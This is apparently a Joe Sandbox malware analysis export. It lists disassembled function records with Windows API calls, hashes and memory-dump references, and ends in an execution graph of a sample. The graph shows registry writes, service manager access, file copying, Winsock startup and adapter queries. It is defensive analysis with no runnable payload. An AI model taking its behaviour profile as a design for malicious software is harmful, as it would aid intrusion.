                                                                                                                                        • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                                                        • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                                        • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                                        • String ID: T$H
                                                                                                                                        • API String ID: 2018770650-488339322
                                                                                                                                        • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                                                        • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                                                                        • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                                                        • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                                                                        APIs
                                                                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                                                                        • String ID: T$H
                                                                                                                                        • API String ID: 377330604-488339322
                                                                                                                                        • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                                        • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                                                        • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                                        • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(74350000,00481A2F), ref: 0047D0E2
                                                                                                                                          • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                                                          • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                                                        Strings
                                                                                                                                        • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                        • String ID: Detected restart. Removing temporary directory.
                                                                                                                                        • API String ID: 1717587489-3199836293
                                                                                                                                        • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                                        • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                                                        • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                                        • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1458359878-0
                                                                                                                                        • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                                                        • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                                                        • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                                                        • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:69.9%
                                                                                                                                        Signature Coverage:17%
                                                                                                                                        Total number of Nodes:481
                                                                                                                                        Total number of Limit Nodes:26
                                                                                                                                        execution_graph 61208 401f60 61209 40dcda VirtualAlloc 61208->61209 61210 402a20 GetVersion 61234 403b64 HeapCreate 61210->61234 61212 402a7f 61213 402a84 61212->61213 61214 402a8c 61212->61214 61309 402b3b 8 API calls 61213->61309 61246 403844 61214->61246 61218 402a94 GetCommandLineA 61260 403712 61218->61260 61222 402aae 61292 40340c 61222->61292 61224 402ab3 61225 402ab8 GetStartupInfoA 61224->61225 61305 4033b4 61225->61305 61227 402aca GetModuleHandleA 61229 402aee 61227->61229 61310 40315b GetCurrentProcess TerminateProcess ExitProcess 61229->61310 61231 402af7 61311 403230 UnhandledExceptionFilter 61231->61311 61233 402b08 61235 403b84 61234->61235 61236 403bba 61234->61236 61312 403a1c 19 API calls 61235->61312 61236->61212 61238 403b89 61239 403ba0 61238->61239 61240 403b93 61238->61240 61242 403bbd 61239->61242 61314 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61239->61314 61313 403f3b HeapAlloc 61240->61313 61242->61212 61244 403b9d 61244->61242 61245 403bae HeapDestroy 61244->61245 61245->61236 61315 402b5f 61246->61315 61249 403863 GetStartupInfoA 61252 4038af 61249->61252 61253 403974 61249->61253 61252->61253 61257 402b5f 12 API calls 61252->61257 61259 403920 61252->61259 61254 40399b GetStdHandle 61253->61254 61255 4039db SetHandleCount 61253->61255 61254->61253 61256 4039a9 GetFileType 61254->61256 61255->61218 61256->61253 61257->61252 61258 403942 GetFileType 61258->61259 61259->61253 61259->61258 61261 403760 61260->61261 61262 40372d GetEnvironmentStringsW 61260->61262 61263 403751 61261->61263 61265 403735 61261->61265 61264 403741 GetEnvironmentStrings 61262->61264 61262->61265 61266 402aa4 61263->61266 61269 4037f3 GetEnvironmentStrings 61263->61269 61270 4037ff 61263->61270 61264->61263 61264->61266 61267 403779 WideCharToMultiByte 61265->61267 61268 40376d GetEnvironmentStringsW 61265->61268 61283 4034c5 61266->61283 61272 4037ad 61267->61272 61273 4037df FreeEnvironmentStringsW 61267->61273 61268->61266 61268->61267 61269->61266 61269->61270 61274 402b5f 12 API calls 61270->61274 61275 402b5f 12 API calls 61272->61275 61273->61266 61281 40381a 61274->61281 61276 4037b3 61275->61276 61276->61273 61277 4037bc WideCharToMultiByte 61276->61277 61279 4037d6 61277->61279 61280 4037cd 61277->61280 61278 403830 FreeEnvironmentStringsA 61278->61266 61279->61273 61324 402c11 61280->61324 61281->61278 61284 4034d7 61283->61284 61285 4034dc GetModuleFileNameA 61283->61285 61337 405d24 19 API calls 61284->61337 61287 4034ff 61285->61287 61288 402b5f 12 API calls 61287->61288 61289 403520 61288->61289 61290 403530 61289->61290 61338 402b16 7 API calls 61289->61338 61290->61222 61293 403419 61292->61293 61296 40341e 61292->61296 61339 405d24 19 API calls 61293->61339 61295 402b5f 12 API calls 61297 40344b 61295->61297 61296->61295 61304 40345f 61297->61304 61340 402b16 7 API calls 61297->61340 61299 4034a2 61300 402c11 7 API calls 61299->61300 61301 4034ae 61300->61301 61301->61224 61302 402b5f 12 API calls 61302->61304 61304->61299 61304->61302 61341 402b16 7 API calls 61304->61341 61306 4033bd 61305->61306 61308 4033c2 61305->61308 61342 405d24 19 API calls 61306->61342 61308->61227 61310->61231 61311->61233 61312->61238 61313->61244 61314->61244 61319 402b71 61315->61319 61318 402b16 7 API calls 61318->61249 61320 402b6e 61319->61320 61322 402b78 61319->61322 61320->61249 61320->61318 61322->61320 61323 402b9d 12 API calls 61322->61323 61323->61322 61325 402c39 61324->61325 61326 402c1d 61324->61326 61325->61279 61327 402c27 61326->61327 61328 402c3d 61326->61328 61330 402c69 HeapFree 61327->61330 61331 402c33 61327->61331 61329 402c68 61328->61329 61332 402c57 61328->61332 61329->61330 61330->61325 61335 403fae VirtualFree VirtualFree HeapFree 61331->61335 61336 404a3f VirtualFree HeapFree VirtualFree 61332->61336 61335->61325 61336->61325 61337->61285 61338->61290 61339->61296 61340->61304 61341->61304 61342->61308 60972 401802 RegCreateKeyExA 60973 401815 60972->60973 60973->60973 61343 40d263 61344 40dd60 RegSetValueExA 61343->61344 61345 40d1e3 RegCloseKey 61346 40d1e9 61345->61346 61347 402067 61350 401301 FindResourceA 61347->61350 61349 40206c 61351 401367 SizeofResource 61350->61351 61356 401360 61350->61356 61352 401386 LoadResource LockResource GlobalAlloc 61351->61352 61351->61356 61353 4013cc 61352->61353 61354 40141f GetTickCount 61353->61354 61357 40142a GlobalAlloc 61354->61357 61356->61349 61357->61356 60974 40d1c8 lstrcmpiW 61358 2c0e8a8 CreateFileA 61359 2c0e9a4 61358->61359 61362 2c0e8d9 61358->61362 61360 2c0e8f1 DeviceIoControl 61360->61362 61361 2c0e99a CloseHandle 61361->61359 61362->61360 61362->61361 61363 2c0e966 GetLastError 61362->61363 61365 2c127c5 60 API calls 3 library calls 61362->61365 61363->61361 61363->61362 61365->61362 61366 2c0e9ac LoadLibraryA 61367 2c0e9d5 GetProcAddress 61366->61367 61368 2c0ea8f 61366->61368 61369 2c0ea88 FreeLibrary 61367->61369 61372 2c0e9e9 61367->61372 61369->61368 61370 2c0e9fb GetAdaptersInfo 61370->61372 61371 2c0ea83 61371->61369 61372->61370 61372->61371 61372->61372 61374 2c127c5 60 API calls 3 library calls 61372->61374 61374->61372 61375 40192c 61376 401cc4 LoadLibraryExA 61375->61376 61377 40184f GetLastError 61375->61377 61379 401f68 61376->61379 61377->61376 60975 2c0104d 60980 2c123b4 60975->60980 60986 2c122b8 60980->60986 60982 2c01057 60983 2c01aa9 InterlockedIncrement 60982->60983 60984 2c01ac5 WSAStartup InterlockedExchange 60983->60984 60985 2c0105c 60983->60985 60984->60985 60987 2c122c4 _raise 60986->60987 60994 2c17150 60987->60994 60993 2c122eb _raise 60993->60982 61011 2c174ab 60994->61011 60996 2c122cd 60997 2c122fc RtlDecodePointer RtlDecodePointer 60996->60997 60998 2c12329 60997->60998 60999 2c122d9 60997->60999 60998->60999 61020 2c17d1d 60 API calls _raise 60998->61020 61008 2c122f6 60999->61008 61001 2c1233b 61002 2c1238c RtlEncodePointer RtlEncodePointer 61001->61002 61004 2c12360 61001->61004 61021 2c176b9 62 API calls 2 library calls 61001->61021 61002->60999 61004->60999 61007 2c1237a RtlEncodePointer 61004->61007 61022 2c176b9 62 API calls 2 library calls 61004->61022 61006 2c12374 61006->60999 61006->61007 61007->61002 61023 2c17159 61008->61023 61012 2c174bc 61011->61012 61013 2c174cf RtlEnterCriticalSection 61011->61013 61018 2c17533 59 API calls 9 library calls 61012->61018 61013->60996 61015 2c174c2 61015->61013 61019 2c16ffd 59 API calls 3 library calls 61015->61019 61018->61015 61020->61001 61021->61004 61022->61006 61026 2c17615 RtlLeaveCriticalSection 61023->61026 61025 2c122fb 61025->60993 61026->61025 61380 401c2f RegOpenKeyExA 61027 2c06410 61058 2c060f1 _memset shared_ptr 61027->61058 61028 2c06105 Sleep 61029 2c0610b RtlEnterCriticalSection RtlLeaveCriticalSection 61028->61029 61029->61027 61030 2c0649f RtlEnterCriticalSection RtlLeaveCriticalSection 61066 2c1134c 61030->61066 61034 2c067f8 RtlEnterCriticalSection RtlLeaveCriticalSection 61034->61058 61035 2c1134c 66 API calls 61035->61058 61039 2c0695d RtlEnterCriticalSection 61040 2c0698a RtlLeaveCriticalSection 61039->61040 61039->61058 61104 2c03c67 72 API calls Mailbox 61040->61104 61041 2c11fbc _malloc 59 API calls 61041->61058 61046 2c125f6 65 API calls _strtok 61046->61058 61054 2c0972a 73 API calls 61054->61058 61058->61028 61058->61029 61058->61030 61058->61034 61058->61035 61058->61039 61058->61040 61058->61041 61058->61046 61058->61054 61059 2c06770 shared_ptr 61058->61059 61060 2c06775 Sleep 61058->61060 61063 2c05c12 61058->61063 61076 2c11fbc 61058->61076 61093 2c11860 59 API calls _vscan_fn 61058->61093 61094 2c11f84 59 API calls 2 library calls 61058->61094 61095 2c127c5 60 API calls 3 library calls 61058->61095 61096 2c0873c 6 API calls __EH_prolog 61058->61096 61097 2c09854 60 API calls 2 library calls 61058->61097 61098 2c05119 103 API calls 3 library calls 61058->61098 61099 2c09c14 88 API calls 3 library calls 61058->61099 61101 2c04100 GetProcessHeap HeapFree 61058->61101 61102 2c11428 84 API calls 3 library calls 61058->61102 61103 2c01ba7 RtlEnterCriticalSection RtlLeaveCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection __EH_prolog 61058->61103 61105 2c03d7e 64 API calls 61058->61105 61106 2c07340 89 API calls 61058->61106 61107 2c0c11c 73 API calls Mailbox 61058->61107 61108 2c073ef 71 API calls Mailbox 61058->61108 61109 2c033b2 86 API calls 61058->61109 61110 2c08008 88 API calls __EH_prolog 61058->61110 61059->61060 61100 2c10900 GetProcessHeap HeapFree 61060->61100 61064 2c11fbc _malloc 59 API calls 61063->61064 61065 2c05c25 61064->61065 61067 2c1137b 61066->61067 61068 2c11358 61066->61068 61113 2c11393 66 API calls 4 library calls 61067->61113 61068->61067 61069 2c1135e 61068->61069 61111 2c14acb 59 API calls __getptd_noexit 61069->61111 61072 2c1138e 61072->61058 61073 2c11363 61112 2c13b65 9 API calls _raise 61073->61112 61075 2c1136e 61075->61058 61077 2c12037 61076->61077 61090 2c11fc8 61076->61090 61120 2c16e73 RtlDecodePointer 61077->61120 61079 2c11fd3 61079->61090 61114 2c17291 59 API calls 2 library calls 61079->61114 61115 2c172ee 59 API calls 8 library calls 61079->61115 61116 2c16eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61079->61116 61080 2c1203d 61121 2c14acb 59 API calls __getptd_noexit 61080->61121 61083 2c11ffb RtlAllocateHeap 61084 2c06541 RtlEnterCriticalSection RtlLeaveCriticalSection 61083->61084 61083->61090 61084->61058 61086 2c12023 61118 2c14acb 59 API calls __getptd_noexit 61086->61118 61090->61079 61090->61083 61090->61086 61091 2c12021 61090->61091 61117 2c16e73 RtlDecodePointer 61090->61117 61119 2c14acb 59 API calls __getptd_noexit 61091->61119 61093->61058 61094->61058 61095->61058 61096->61058 61097->61058 61098->61058 61099->61058 61100->61058 61101->61058 61102->61058 61103->61058 61104->61058 61105->61058 61106->61058 61107->61058 61108->61058 61109->61058 61110->61058 61111->61073 61112->61075 61113->61072 61114->61079 61115->61079 61117->61090 61118->61091 61119->61084 61120->61080 61121->61084 61381 401cf1 61382 401cf5 CopyFileA 61381->61382 61384 40d1c0 61382->61384 61122 40d852 Sleep 61124 401840 61122->61124 61123 40d15c GetStartupInfoA 61126 40d18a 61123->61126 61124->61123 61125 40d97c 61124->61125 61126->61126 61385 4018b3 61389 2c12988 61385->61389 61387 401c22 61390 2c12991 61389->61390 61391 2c12996 61389->61391 61403 2c1918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61390->61403 61395 2c129ab 61391->61395 61394 4018b5 Sleep 61394->61387 61396 2c129b7 _raise 61395->61396 61400 2c12a05 ___DllMainCRTStartup 61396->61400 61402 2c12a62 _raise 61396->61402 61404 2c12816 61396->61404 61398 2c12a3f 61399 2c12816 __CRT_INIT@12 138 API calls 61398->61399 61398->61402 61399->61402 61400->61398 61401 2c12816 __CRT_INIT@12 138 API calls 61400->61401 61400->61402 61401->61398 61402->61394 61403->61391 61405 2c12822 _raise 61404->61405 61406 2c128a4 61405->61406 61407 2c1282a 61405->61407 61409 2c128a8 61406->61409 61410 2c1290d 61406->61410 61452 2c16e56 GetProcessHeap 61407->61452 61414 2c128c9 61409->61414 61422 2c12833 _raise __CRT_INIT@12 61409->61422 61541 2c17019 59 API calls _doexit 61409->61541 61412 2c12970 61410->61412 61413 2c12912 61410->61413 61411 2c1282f 61411->61422 61453 2c14a04 61411->61453 61412->61422 61556 2c14894 59 API calls 2 library calls 61412->61556 61546 2c17d8b TlsGetValue 61413->61546 61542 2c16ef0 61 API calls _free 61414->61542 61419 2c1291d 61419->61422 61547 2c1762a 61419->61547 61421 2c128ce 61433 2c128df __CRT_INIT@12 61421->61433 61543 2c18e2a 60 API calls _free 61421->61543 61422->61400 61426 2c1283f __RTC_Initialize 61426->61422 61427 2c1284f GetCommandLineA 61426->61427 61474 2c19228 GetEnvironmentStringsW 61427->61474 61429 2c128da 61544 2c14a7a 62 API calls 2 library calls 61429->61544 61545 2c128f8 62 API calls __mtterm 61433->61545 61435 2c12946 61436 2c12964 61435->61436 61437 2c1294c 61435->61437 61555 2c11f84 59 API calls 2 library calls 61436->61555 61554 2c14951 59 API calls 4 library calls 61437->61554 61441 2c12869 61443 2c1286d 61441->61443 61506 2c18e7c 61441->61506 61442 2c12954 GetCurrentThreadId 61442->61422 61539 2c14a7a 62 API calls 2 library calls 61443->61539 61447 2c1288d 61447->61422 61540 2c18e2a 60 API calls _free 61447->61540 61452->61411 61557 2c170c0 36 API calls 2 library calls 61453->61557 61455 2c14a09 61558 2c175dc InitializeCriticalSectionAndSpinCount ___lock_fhandle 61455->61558 61457 2c14a0e 61458 2c14a12 61457->61458 61560 2c17d4e TlsAlloc 61457->61560 61559 2c14a7a 62 API calls 2 library calls 61458->61559 61461 2c14a24 61461->61458 61463 2c14a2f 61461->61463 61462 2c14a17 61462->61426 61464 2c1762a __calloc_crt 59 API calls 61463->61464 61465 2c14a3c 61464->61465 61466 2c14a71 61465->61466 61561 2c17daa TlsSetValue 61465->61561 61563 2c14a7a 62 API calls 2 library calls 61466->61563 61469 2c14a50 61469->61466 61471 2c14a56 61469->61471 61470 2c14a76 61470->61426 61562 2c14951 59 API calls 4 library calls 61471->61562 61473 2c14a5e GetCurrentThreadId 61473->61426 61476 2c1923b 61474->61476 61479 2c1285f 61474->61479 61475 2c19253 WideCharToMultiByte 61477 2c192a5 FreeEnvironmentStringsW 61475->61477 61478 2c1926e 61475->61478 61476->61475 61476->61476 61477->61479 61564 2c17672 59 API calls 2 library calls 61478->61564 61487 2c18b76 61479->61487 61481 2c19274 61481->61477 61482 2c1927b WideCharToMultiByte 61481->61482 61483 2c19291 61482->61483 61484 2c1929a FreeEnvironmentStringsW 61482->61484 61565 2c11f84 59 API calls 2 library calls 61483->61565 61484->61479 61486 2c19297 61486->61484 61488 2c18b82 _raise 61487->61488 61489 2c174ab __lock 59 API calls 61488->61489 61490 2c18b89 61489->61490 61491 2c1762a __calloc_crt 59 API calls 61490->61491 61493 2c18b9a 61491->61493 61492 2c18c05 GetStartupInfoW 61500 2c18c1a 61492->61500 61503 2c18d49 61492->61503 61493->61492 61494 2c18ba5 _raise @_EH4_CallFilterFunc@8 61493->61494 61494->61441 61495 2c18e11 61568 2c18e21 RtlLeaveCriticalSection _doexit 61495->61568 61497 2c1762a __calloc_crt 59 API calls 61497->61500 61498 2c18d96 GetStdHandle 61498->61503 61499 2c18da9 GetFileType 61499->61503 61500->61497 61501 2c18c68 61500->61501 61500->61503 61502 2c18c9c GetFileType 61501->61502 61501->61503 61566 2c17dcc InitializeCriticalSectionAndSpinCount 61501->61566 61502->61501 61503->61495 61503->61498 61503->61499 61567 2c17dcc InitializeCriticalSectionAndSpinCount 61503->61567 61507 2c18e8a 61506->61507 61508 2c18e8f GetModuleFileNameA 61506->61508 61575 2c13efa 71 API calls __setmbcp 61507->61575 61509 2c18ebc 61508->61509 61569 2c18f2f 61509->61569 61512 2c12879 61512->61447 61517 2c190ab 61512->61517 61515 2c18ef5 61515->61512 61516 2c18f2f _parse_cmdline 59 API calls 61515->61516 61516->61512 61518 2c190b4 61517->61518 61521 2c190b9 _strlen 61517->61521 61579 2c13efa 71 API calls __setmbcp 61518->61579 61520 2c12882 61520->61447 61533 2c17028 61520->61533 61521->61520 61522 2c1762a __calloc_crt 59 API calls 61521->61522 61527 2c190ef _strlen 61522->61527 61523 2c19141 61581 2c11f84 59 API calls 2 library calls 61523->61581 61525 2c1762a __calloc_crt 59 API calls 61525->61527 61526 2c19168 61582 2c11f84 59 API calls 2 library calls 61526->61582 61527->61520 61527->61523 61527->61525 61527->61526 61530 2c1917f 61527->61530 61580 2c1592c 59 API calls _raise 61527->61580 61583 2c13b75 8 API calls 2 library calls 61530->61583 61532 2c1918b 61535 2c17034 __IsNonwritableInCurrentImage 61533->61535 61584 2c1ab8f 61535->61584 61536 2c17052 __initterm_e 61537 2c123b4 __cinit 68 API calls 61536->61537 61538 2c17071 _doexit __IsNonwritableInCurrentImage 61536->61538 61537->61538 61538->61447 61539->61422 61540->61443 61541->61414 61542->61421 61543->61429 61544->61433 61545->61422 61546->61419 61548 2c17631 61547->61548 61550 2c1292e 61548->61550 61552 2c1764f 61548->61552 61587 2c1e9b8 61548->61587 61550->61422 61553 2c17daa TlsSetValue 61550->61553 61552->61548 61552->61550 61595 2c180c5 Sleep 61552->61595 61553->61435 61554->61442 61555->61422 61556->61422 61557->61455 61558->61457 61559->61462 61560->61461 61561->61469 61562->61473 61563->61470 61564->61481 61565->61486 61566->61501 61567->61503 61568->61494 61571 2c18f51 61569->61571 61572 2c18fb5 61571->61572 61577 2c1ef96 59 API calls x_ismbbtype_l 61571->61577 61573 2c18ed2 61572->61573 61578 2c1ef96 59 API calls x_ismbbtype_l 61572->61578 61573->61512 61576 2c17672 59 API calls 2 library calls 61573->61576 61575->61508 61576->61515 61577->61571 61578->61572 61579->61521 61580->61527 61581->61520 61582->61520 61583->61532 61585 2c1ab92 RtlEncodePointer 61584->61585 61585->61585 61586 2c1abac 61585->61586 61586->61536 61588 2c1e9c3 61587->61588 61592 2c1e9de 61587->61592 61589 2c1e9cf 61588->61589 61588->61592 61596 2c14acb 59 API calls __getptd_noexit 61589->61596 61590 2c1e9ee RtlAllocateHeap 61590->61592 61593 2c1e9d4 61590->61593 61592->61590 61592->61593 61597 2c16e73 RtlDecodePointer 61592->61597 61593->61548 61595->61552 61596->61593 61597->61592 61127 2c9c01d DeleteFileA 61598 4017f5 OpenSCManagerA 61599 401c62 61598->61599 61128 402056 61129 40d4bb 61128->61129 61130 40d49e CreateDirectoryA 61129->61130 61130->61129 61131 402418 61132 40d6c7 RegQueryValueExA 61131->61132 61600 2c419fc 61601 2c74e2f CreateFileA 61600->61601 61133 401e1c 61134 40de1e RegCloseKey 61133->61134 61135 40175d 61136 40d593 CopyFileA 61135->61136 61137 2c05e5f RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61207 2c042c7 61137->61207 61139 2c05ecc GetTickCount 61140 2c059fa 59 API calls 61139->61140 61141 2c05ee9 GetVersionExA 61140->61141 61142 2c05f2a _memset 61141->61142 61143 2c11fbc _malloc 59 API calls 61142->61143 61144 2c05f37 61143->61144 61145 2c11fbc _malloc 59 API calls 61144->61145 61146 2c05f47 61145->61146 61147 2c11fbc _malloc 59 API calls 61146->61147 61148 2c05f52 61147->61148 61149 2c11fbc _malloc 59 API calls 61148->61149 61150 2c05f5d 61149->61150 61151 2c11fbc _malloc 59 API calls 61150->61151 61152 2c05f68 61151->61152 61153 2c11fbc _malloc 59 API calls 61152->61153 61154 2c05f73 61153->61154 61155 2c11fbc _malloc 59 API calls 61154->61155 61156 2c05f7e 61155->61156 61157 2c11fbc _malloc 59 API calls 61156->61157 61158 2c05f8a 6 API calls 61157->61158 61159 2c05fd7 _memset 61158->61159 61160 2c05ff0 RtlEnterCriticalSection RtlLeaveCriticalSection 61159->61160 61161 2c11fbc _malloc 59 API calls 61160->61161 61162 2c0602c 61161->61162 61163 2c11fbc _malloc 59 API calls 61162->61163 61164 2c0603a 61163->61164 61165 2c11fbc _malloc 59 API calls 61164->61165 61166 2c06041 61165->61166 61167 2c11fbc _malloc 59 API calls 61166->61167 61168 2c06062 QueryPerformanceCounter Sleep 61167->61168 61169 2c11fbc _malloc 59 API calls 61168->61169 61170 2c06088 61169->61170 61171 2c11fbc _malloc 59 API calls 61170->61171 61183 2c06098 _memset 61171->61183 61172 2c06105 Sleep 61173 2c0610b RtlEnterCriticalSection RtlLeaveCriticalSection 61172->61173 61173->61183 61174 2c0649f RtlEnterCriticalSection RtlLeaveCriticalSection 61175 2c1134c 66 API calls 61174->61175 61175->61183 61176 2c1134c 66 API calls 61176->61183 61177 2c11fbc _malloc 59 API calls 61178 2c06541 RtlEnterCriticalSection RtlLeaveCriticalSection 61177->61178 61178->61183 61179 2c067f8 RtlEnterCriticalSection RtlLeaveCriticalSection 61179->61183 61180 2c05c12 59 API calls 61180->61183 61181 2c11428 _sprintf 84 API calls 61181->61183 61182 2c01ba7 RtlEnterCriticalSection RtlLeaveCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection 61182->61183 61183->61172 61183->61173 61183->61174 61183->61176 61183->61177 61183->61179 61183->61180 61183->61181 61183->61182 61184 2c0695d RtlEnterCriticalSection 61183->61184 61185 2c0698a RtlLeaveCriticalSection 61183->61185 61186 2c11fbc _malloc 59 API calls 61183->61186 61188 2c03d7e 64 API calls 61183->61188 61189 2c07340 89 API calls 61183->61189 61190 2c11f84 _free 59 API calls 61183->61190 61191 2c125f6 65 API calls _strtok 61183->61191 61192 2c0972a 73 API calls 61183->61192 61193 2c08008 88 API calls 61183->61193 61194 2c127c5 _Allocate 60 API calls 61183->61194 61195 2c073ef 71 API calls 61183->61195 61196 2c11860 _swscanf 59 API calls 61183->61196 61197 2c033b2 86 API calls 61183->61197 61198 2c0873c 6 API calls 61183->61198 61199 2c09854 60 API calls 61183->61199 61200 2c05119 103 API calls 61183->61200 61201 2c0c11c 73 API calls 61183->61201 61202 2c09c14 88 API calls 61183->61202 61203 2c06775 Sleep 61183->61203 61205 2c06770 shared_ptr 61183->61205 61184->61183 61184->61185 61187 2c03c67 72 API calls 